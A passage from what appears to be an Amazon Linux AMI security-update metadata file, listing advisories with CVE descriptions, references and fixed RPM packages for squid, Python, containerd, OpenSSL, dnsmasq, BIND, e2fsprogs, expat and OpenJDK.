arch="i686"><filename>Packages/samba-winbind-modules-4.10.16-5.54.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1453</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1453: important priority package update for squid</title><issued date="2020-11-16 17:59:00" /><updated date="2020-11-16 20:46:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-8450:
An issue was discovered in Squid before 4.10. Due to incorrect buffer management, a remote client can cause a buffer overflow in a Squid instance acting as a reverse proxy.
1798552: CVE-2020-8450 squid: Buffer overflow in reverse-proxy configurations
1798552: CVE-2020-8450 squid: Buffer overflow in a Squid acting as reverse-proxy
CVE-2020-8449:
An issue was discovered in Squid before 4.10. Due to incorrect input validation, it can interpret crafted HTTP requests in unexpected ways to access server resources prohibited by earlier security filters.
1798540: CVE-2020-8449 squid: Improper input validation issues in HTTP Request processing
CVE-2020-24606:
Squid before 4.13 and 5.x before 5.0.4 allows a trusted peer to perform Denial of Service by consuming all available CPU cycles during handling of a crafted Cache Digest response message. This only occurs when cache_peer is used with the cache digests feature. The problem exists because peerDigestHandleReply() livelocking in peer_digest.cc mishandles EOF.
1871705: CVE-2020-24606 squid: Improper input validation could result in a DoS
CVE-2020-15811:
A flaw was found in squid. Due to incorrect data validation, an HTTP Request Splitting attack against HTTP and HTTPS traffic is possible leading to cache poisoning. The highest threat from this vulnerability is to data confidentiality and integrity.
1871702: CVE-2020-15811 squid: HTTP Request Splitting could result in cache poisoning
CVE-2020-15810:
A flaw was found in squid. Due to incorrect data validation, a HTTP Request Smuggling attack against HTTP and HTTPS traffic is possible leading to cache poisoning. The highest threat from this vulnerability is to data confidentiality and integrity.
1871700: CVE-2020-15810 squid: HTTP Request Smuggling could result in cache poisoning
CVE-2020-15049:
An issue was discovered in http/ContentLengthInterpreter.cc in Squid before 4.12 and 5.x before 5.0.3. A Request Smuggling and Poisoning attack can succeed against the HTTP cache. The client sends an HTTP request with a Content-Length header containing "+\ "-" or an uncommon shell whitespace character prefix to the length field-value.
1852550: CVE-2020-15049 squid: Request smuggling and poisoning attack against the HTTP cache
CVE-2019-12528:
An issue was discovered in Squid before 4.10. It allows a crafted FTP server to trigger disclosure of sensitive information from heap memory, such as information associated with other users' sessions or non-Squid processes.
1798534: CVE-2019-12528 squid: Information Disclosure issue in FTP Gateway
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12528" title="" id="CVE-2019-12528" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15049" title="" id="CVE-2020-15049" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15810" title="" id="CVE-2020-15810" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15811" title="" id="CVE-2020-15811" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24606" title="" id="CVE-2020-24606" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8449" title="" id="CVE-2020-8449" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8450" title="" id="CVE-2020-8450" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="squid" version="3.5.20" release="17.41.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-3.5.20-17.41.amzn1.x86_64.rpm</filename></package><package name="squid-migration-script" version="3.5.20" release="17.41.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-migration-script-3.5.20-17.41.amzn1.x86_64.rpm</filename></package><package name="squid-debuginfo" version="3.5.20" release="17.41.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-debuginfo-3.5.20-17.41.amzn1.x86_64.rpm</filename></package><package name="squid" version="3.5.20" release="17.41.amzn1" epoch="7" arch="i686"><filename>Packages/squid-3.5.20-17.41.amzn1.i686.rpm</filename></package><package name="squid-migration-script" version="3.5.20" release="17.41.amzn1" epoch="7" arch="i686"><filename>Packages/squid-migration-script-3.5.20-17.41.amzn1.i686.rpm</filename></package><package name="squid-debuginfo" version="3.5.20" release="17.41.amzn1" epoch="7" arch="i686"><filename>Packages/squid-debuginfo-3.5.20-17.41.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1454</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1454: medium priority package update for python27 python34 python35</title><issued date="2020-11-16 17:59:00" /><updated date="2020-11-16 20:45:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-26116:
http.client in Python 3.x before 3.5.10, 3.6.x before 3.6.12, 3.7.x before 3.7.9, and 3.8.x before 3.8.5 allows CRLF injection if the attacker controls the HTTP request method, as demonstrated by inserting CR and LF control characters in the first argument of HTTPConnection.request.
1883014: CVE-2020-26116 python: CRLF injection via HTTP request method in httplib/http.client
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26116" title="" id="CVE-2020-26116" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python35-devel" version="3.5.10" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-devel-3.5.10-1.29.amzn1.x86_64.rpm</filename></package><package name="python35-test" version="3.5.10" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-test-3.5.10-1.29.amzn1.x86_64.rpm</filename></package><package name="python35-tools" version="3.5.10" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-tools-3.5.10-1.29.amzn1.x86_64.rpm</filename></package><package name="python35-libs" version="3.5.10" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-libs-3.5.10-1.29.amzn1.x86_64.rpm</filename></package><package name="python35" version="3.5.10" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-3.5.10-1.29.amzn1.x86_64.rpm</filename></package><package name="python35-debuginfo" version="3.5.10" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-debuginfo-3.5.10-1.29.amzn1.x86_64.rpm</filename></package><package name="python35-tools" version="3.5.10" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/python35-tools-3.5.10-1.29.amzn1.i686.rpm</filename></package><package name="python35-devel" version="3.5.10" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/python35-devel-3.5.10-1.29.amzn1.i686.rpm</filename></package><package name="python35-debuginfo" version="3.5.10" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/python35-debuginfo-3.5.10-1.29.amzn1.i686.rpm</filename></package><package name="python35" version="3.5.10" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/python35-3.5.10-1.29.amzn1.i686.rpm</filename></package><package name="python35-test" version="3.5.10" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/python35-test-3.5.10-1.29.amzn1.i686.rpm</filename></package><package name="python35-libs" version="3.5.10" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/python35-libs-3.5.10-1.29.amzn1.i686.rpm</filename></package><package name="python27-libs" version="2.7.18" release="2.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-libs-2.7.18-2.140.amzn1.x86_64.rpm</filename></package><package name="python27-debuginfo" version="2.7.18" release="2.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-debuginfo-2.7.18-2.140.amzn1.x86_64.rpm</filename></package><package name="python27-test" version="2.7.18" release="2.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-test-2.7.18-2.140.amzn1.x86_64.rpm</filename></package><package name="python27-devel" version="2.7.18" release="2.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-devel-2.7.18-2.140.amzn1.x86_64.rpm</filename></package><package name="python27-tools" version="2.7.18" release="2.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-tools-2.7.18-2.140.amzn1.x86_64.rpm</filename></package><package name="python27" version="2.7.18" release="2.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-2.7.18-2.140.amzn1.x86_64.rpm</filename></package><package name="python27-tools" version="2.7.18" release="2.140.amzn1" epoch="0" arch="i686"><filename>Packages/python27-tools-2.7.18-2.140.amzn1.i686.rpm</filename></package><package name="python27-test" version="2.7.18" release="2.140.amzn1" epoch="0" arch="i686"><filename>Packages/python27-test-2.7.18-2.140.amzn1.i686.rpm</filename></package><package name="python27-devel" version="2.7.18" release="2.140.amzn1" epoch="0" arch="i686"><filename>Packages/python27-devel-2.7.18-2.140.amzn1.i686.rpm</filename></package><package name="python27-libs" version="2.7.18" release="2.140.amzn1" epoch="0" arch="i686"><filename>Packages/python27-libs-2.7.18-2.140.amzn1.i686.rpm</filename></package><package name="python27-debuginfo" version="2.7.18" release="2.140.amzn1" epoch="0" arch="i686"><filename>Packages/python27-debuginfo-2.7.18-2.140.amzn1.i686.rpm</filename></package><package name="python27" version="2.7.18" release="2.140.amzn1" epoch="0" arch="i686"><filename>Packages/python27-2.7.18-2.140.amzn1.i686.rpm</filename></package><package name="python34-debuginfo" version="3.4.10" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-debuginfo-3.4.10-1.53.amzn1.x86_64.rpm</filename></package><package name="python34" version="3.4.10" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-3.4.10-1.53.amzn1.x86_64.rpm</filename></package><package name="python34-devel" version="3.4.10" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-devel-3.4.10-1.53.amzn1.x86_64.rpm</filename></package><package name="python34-tools" version="3.4.10" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-tools-3.4.10-1.53.amzn1.x86_64.rpm</filename></package><package name="python34-test" version="3.4.10" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-test-3.4.10-1.53.amzn1.x86_64.rpm</filename></package><package name="python34-libs" version="3.4.10" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-libs-3.4.10-1.53.amzn1.x86_64.rpm</filename></package><package name="python34-tools" version="3.4.10" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/python34-tools-3.4.10-1.53.amzn1.i686.rpm</filename></package><package name="python34" version="3.4.10" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/python34-3.4.10-1.53.amzn1.i686.rpm</filename></package><package name="python34-debuginfo" version="3.4.10" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/python34-debuginfo-3.4.10-1.53.amzn1.i686.rpm</filename></package><package name="python34-libs" version="3.4.10" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/python34-libs-3.4.10-1.53.amzn1.i686.rpm</filename></package><package name="python34-test" version="3.4.10" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/python34-test-3.4.10-1.53.amzn1.i686.rpm</filename></package><package name="python34-devel" version="3.4.10" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/python34-devel-3.4.10-1.53.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1455</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1455: important priority package update for containerd</title><issued date="2020-11-20 17:29:00" /><updated date="2020-11-30 20:01:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-15257:
CVE-2020-15257 : Access controls for the shim's API socket verified that the connecting process had an effective UID of 0, but did not otherwise restrict access to the abstract Unix domain socket. This would allow malicious containers running in the same network namespace as the shim, with an effective UID of 0 but otherwise reduced privileges, to cause new processes to be run with elevated privileges.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15257" title="" id="CVE-2020-15257" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="containerd" version="1.4.1" release="2.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/containerd-1.4.1-2.6.amzn1.x86_64.rpm</filename></package><package name="containerd-stress" version="1.4.1" release="2.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/containerd-stress-1.4.1-2.6.amzn1.x86_64.rpm</filename></package><package name="containerd-debuginfo" version="1.4.1" release="2.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/containerd-debuginfo-1.4.1-2.6.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1456</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1456: important priority package update for openssl</title><issued date="2020-12-08 19:28:00" /><updated date="2020-12-08 23:28:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-1971:
A null pointer dereference flaw was found in openssl. A remote attacker, able to control the arguments of the GENERAL_NAME_cmp function, could cause the application, compiled with openssl to crash resulting in a denial of service. The highest threat from this vulnerability is to system availability.
1903409: CVE-2020-1971 openssl: EDIPARTYNAME NULL pointer de-reference
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1971" title="" id="CVE-2020-1971" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssl" version="1.0.2k" release="16.152.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-1.0.2k-16.152.amzn1.x86_64.rpm</filename></package><package name="openssl-perl" version="1.0.2k" release="16.152.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-perl-1.0.2k-16.152.amzn1.x86_64.rpm</filename></package><package name="openssl-devel" version="1.0.2k" release="16.152.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-devel-1.0.2k-16.152.amzn1.x86_64.rpm</filename></package><package name="openssl-debuginfo" version="1.0.2k" release="16.152.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-debuginfo-1.0.2k-16.152.amzn1.x86_64.rpm</filename></package><package name="openssl-static" version="1.0.2k" release="16.152.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-static-1.0.2k-16.152.amzn1.x86_64.rpm</filename></package><package name="openssl-debuginfo" version="1.0.2k" release="16.152.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-debuginfo-1.0.2k-16.152.amzn1.i686.rpm</filename></package><package name="openssl-static" version="1.0.2k" release="16.152.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-static-1.0.2k-16.152.amzn1.i686.rpm</filename></package><package name="openssl" version="1.0.2k" release="16.152.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-1.0.2k-16.152.amzn1.i686.rpm</filename></package><package name="openssl-perl" version="1.0.2k" release="16.152.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-perl-1.0.2k-16.152.amzn1.i686.rpm</filename></package><package name="openssl-devel" version="1.0.2k" release="16.152.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-devel-1.0.2k-16.152.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1458</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1458: low priority package update for dnsmasq</title><issued date="2020-12-16 20:31:00" /><updated date="2023-03-22 18:52:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-14834:
A flaw was found in the Dnsmasq application where a remote attacker can trigger a memory leak by sending specially crafted DHCP responses to the server. A successful attack is dependent on a specific configuration regarding the domain name set into the dnsmasq.conf file. Over time, the memory leak may cause the process to run out of memory and terminate, causing a denial of service.
1764425: CVE-2019-14834 dnsmasq: memory leak in the create_helper() function in /src/helper.c
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14834" title="" id="CVE-2019-14834" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="dnsmasq-utils" version="2.76" release="16.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/dnsmasq-utils-2.76-16.16.amzn1.x86_64.rpm</filename></package><package name="dnsmasq" version="2.76" release="16.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/dnsmasq-2.76-16.16.amzn1.x86_64.rpm</filename></package><package name="dnsmasq-debuginfo" version="2.76" release="16.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/dnsmasq-debuginfo-2.76-16.16.amzn1.x86_64.rpm</filename></package><package name="dnsmasq-debuginfo" version="2.76" release="16.16.amzn1" epoch="0" arch="i686"><filename>Packages/dnsmasq-debuginfo-2.76-16.16.amzn1.i686.rpm</filename></package><package name="dnsmasq-utils" version="2.76" release="16.16.amzn1" epoch="0" arch="i686"><filename>Packages/dnsmasq-utils-2.76-16.16.amzn1.i686.rpm</filename></package><package name="dnsmasq" version="2.76" release="16.16.amzn1" epoch="0" arch="i686"><filename>Packages/dnsmasq-2.76-16.16.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1457</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1457: medium priority package update for bind</title><issued date="2021-01-12 22:51:00" /><updated date="2021-01-13 18:03:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-8622:
A flaw was found in bind. An assertion failure can occur when trying to verify a truncated response to a TSIG-signed request. The highest threat from this vulnerability is to system availability.
1869473: CVE-2020-8622 bind: truncated TSIG response can lead to an assertion failure
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8622" title="" id="CVE-2020-8622" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="bind" version="9.8.2" release="0.68.rc1.85.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-9.8.2-0.68.rc1.85.amzn1.x86_64.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.68.rc1.85.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-libs-9.8.2-0.68.rc1.85.amzn1.x86_64.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.68.rc1.85.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-devel-9.8.2-0.68.rc1.85.amzn1.x86_64.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.68.rc1.85.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-debuginfo-9.8.2-0.68.rc1.85.amzn1.x86_64.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.68.rc1.85.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-utils-9.8.2-0.68.rc1.85.amzn1.x86_64.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.68.rc1.85.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-sdb-9.8.2-0.68.rc1.85.amzn1.x86_64.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.68.rc1.85.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-chroot-9.8.2-0.68.rc1.85.amzn1.x86_64.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.68.rc1.85.amzn1" epoch="32" arch="i686"><filename>Packages/bind-debuginfo-9.8.2-0.68.rc1.85.amzn1.i686.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.68.rc1.85.amzn1" epoch="32" arch="i686"><filename>Packages/bind-chroot-9.8.2-0.68.rc1.85.amzn1.i686.rpm</filename></package><package name="bind" version="9.8.2" release="0.68.rc1.85.amzn1" epoch="32" arch="i686"><filename>Packages/bind-9.8.2-0.68.rc1.85.amzn1.i686.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.68.rc1.85.amzn1" epoch="32" arch="i686"><filename>Packages/bind-libs-9.8.2-0.68.rc1.85.amzn1.i686.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.68.rc1.85.amzn1" epoch="32" arch="i686"><filename>Packages/bind-devel-9.8.2-0.68.rc1.85.amzn1.i686.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.68.rc1.85.amzn1" epoch="32" arch="i686"><filename>Packages/bind-utils-9.8.2-0.68.rc1.85.amzn1.i686.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.68.rc1.85.amzn1" epoch="32" arch="i686"><filename>Packages/bind-sdb-9.8.2-0.68.rc1.85.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1458</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1458: medium priority package update for e2fsprogs</title><issued date="2021-01-12 22:51:00" /><updated date="2021-01-13 18:04:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-5188:
A code execution vulnerability exists in the directory rehashing functionality of E2fsprogs e2fsck 1.45.4. A specially crafted ext4 directory can cause an out-of-bounds write on the stack, resulting in code execution. An attacker can corrupt a partition to trigger this vulnerability.
1790048: CVE-2019-5188 e2fsprogs: Out-of-bounds write in e2fsck/rehash.c
CVE-2019-5094:
An exploitable code execution vulnerability exists in the quota file functionality of E2fsprogs 1.45.3. A specially crafted ext4 partition can cause an out-of-bounds write on the heap, resulting in code execution. An attacker can corrupt a partition to trigger this vulnerability.
1768555: CVE-2019-5094 e2fsprogs: Crafted ext4 partition leads to out-of-bounds write
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5094" title="" id="CVE-2019-5094" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5188" title="" id="CVE-2019-5188" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="e2fsprogs" version="1.43.5" release="2.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/e2fsprogs-1.43.5-2.44.amzn1.x86_64.rpm</filename></package><package name="e2fsprogs-libs" version="1.43.5" release="2.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/e2fsprogs-libs-1.43.5-2.44.amzn1.x86_64.rpm</filename></package><package name="libcom_err" version="1.43.5" release="2.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcom_err-1.43.5-2.44.amzn1.x86_64.rpm</filename></package><package name="libcom_err-devel" version="1.43.5" release="2.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcom_err-devel-1.43.5-2.44.amzn1.x86_64.rpm</filename></package><package name="libss-devel" version="1.43.5" release="2.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/libss-devel-1.43.5-2.44.amzn1.x86_64.rpm</filename></package><package name="libss" version="1.43.5" release="2.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/libss-1.43.5-2.44.amzn1.x86_64.rpm</filename></package><package name="e2fsprogs-debuginfo" version="1.43.5" release="2.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/e2fsprogs-debuginfo-1.43.5-2.44.amzn1.x86_64.rpm</filename></package><package name="e2fsprogs-static" version="1.43.5" release="2.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/e2fsprogs-static-1.43.5-2.44.amzn1.x86_64.rpm</filename></package><package name="e2fsprogs-devel" version="1.43.5" release="2.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/e2fsprogs-devel-1.43.5-2.44.amzn1.x86_64.rpm</filename></package><package name="e2fsprogs-static" version="1.43.5" release="2.44.amzn1" epoch="0" arch="i686"><filename>Packages/e2fsprogs-static-1.43.5-2.44.amzn1.i686.rpm</filename></package><package name="libcom_err-devel" version="1.43.5" release="2.44.amzn1" epoch="0" arch="i686"><filename>Packages/libcom_err-devel-1.43.5-2.44.amzn1.i686.rpm</filename></package><package name="e2fsprogs" version="1.43.5" release="2.44.amzn1" epoch="0" arch="i686"><filename>Packages/e2fsprogs-1.43.5-2.44.amzn1.i686.rpm</filename></package><package name="libss" version="1.43.5" release="2.44.amzn1" epoch="0" arch="i686"><filename>Packages/libss-1.43.5-2.44.amzn1.i686.rpm</filename></package><package name="e2fsprogs-libs" version="1.43.5" release="2.44.amzn1" epoch="0" arch="i686"><filename>Packages/e2fsprogs-libs-1.43.5-2.44.amzn1.i686.rpm</filename></package><package name="e2fsprogs-debuginfo" version="1.43.5" release="2.44.amzn1" epoch="0" arch="i686"><filename>Packages/e2fsprogs-debuginfo-1.43.5-2.44.amzn1.i686.rpm</filename></package><package name="libcom_err" version="1.43.5" release="2.44.amzn1" epoch="0" arch="i686"><filename>Packages/libcom_err-1.43.5-2.44.amzn1.i686.rpm</filename></package><package name="libss-devel" version="1.43.5" release="2.44.amzn1" epoch="0" arch="i686"><filename>Packages/libss-devel-1.43.5-2.44.amzn1.i686.rpm</filename></package><package name="e2fsprogs-devel" version="1.43.5" release="2.44.amzn1" epoch="0" arch="i686"><filename>Packages/e2fsprogs-devel-1.43.5-2.44.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1459</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1459: medium priority package update for expat</title><issued date="2021-01-12 22:51:00" /><updated date="2021-01-13 18:05:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-15903:
In libexpat before 2.2.8, crafted XML input could fool the parser into changing from DTD parsing to document parsing too early; a consecutive call to XML_GetCurrentLineNumber (or XML_GetCurrentColumnNumber) then resulted in a heap-based buffer over-read.
1752592: CVE-2019-15903 expat: heap-based buffer over-read via crafted XML input
CVE-2018-20843:
It was discovered that the "setElementTypePrefix()" function incorrectly extracted XML namespace prefixes. By tricking an application into processing a specially crafted XML file, an attacker could cause unusually high consumption of memory resources and possibly lead to a denial of service.
1723723: CVE-2018-20843 expat: large number of colons in input makes parser consume high amount of resources, leading to DoS
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20843" title="" id="CVE-2018-20843" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15903" title="" id="CVE-2019-15903" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="expat-debuginfo" version="2.1.0" release="12.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/expat-debuginfo-2.1.0-12.24.amzn1.x86_64.rpm</filename></package><package name="expat-devel" version="2.1.0" release="12.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/expat-devel-2.1.0-12.24.amzn1.x86_64.rpm</filename></package><package name="expat" version="2.1.0" release="12.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/expat-2.1.0-12.24.amzn1.x86_64.rpm</filename></package><package name="expat" version="2.1.0" release="12.24.amzn1" epoch="0" arch="i686"><filename>Packages/expat-2.1.0-12.24.amzn1.i686.rpm</filename></package><package name="expat-debuginfo" version="2.1.0" release="12.24.amzn1" epoch="0" arch="i686"><filename>Packages/expat-debuginfo-2.1.0-12.24.amzn1.i686.rpm</filename></package><package name="expat-devel" version="2.1.0" release="12.24.amzn1" epoch="0" arch="i686"><filename>Packages/expat-devel-2.1.0-12.24.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1460</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1460: medium priority package update for java-1.8.0-openjdk</title><issued date="2021-01-12 22:51:00" /><updated date="2021-01-13 18:06:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-14803:
Vulnerability in the Java SE product of Oracle Java SE (component: Libraries). Supported versions that are affected are Java SE: 11.0.8 and 15. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Java SE accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 5.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N).
1889895: CVE-2020-14803 OpenJDK: Race condition in NIO Buffer boundary checks (Libraries, 8244136)
CVE-2020-14797:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Libraries). Supported versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE, Java SE Embedded accessible data. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.1 Base Score 3.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N).
1889717: CVE-2020-14797 OpenJDK: Incomplete check for invalid characters in URI to path conversion (Libraries, 8242685)
CVE-2020-14796:
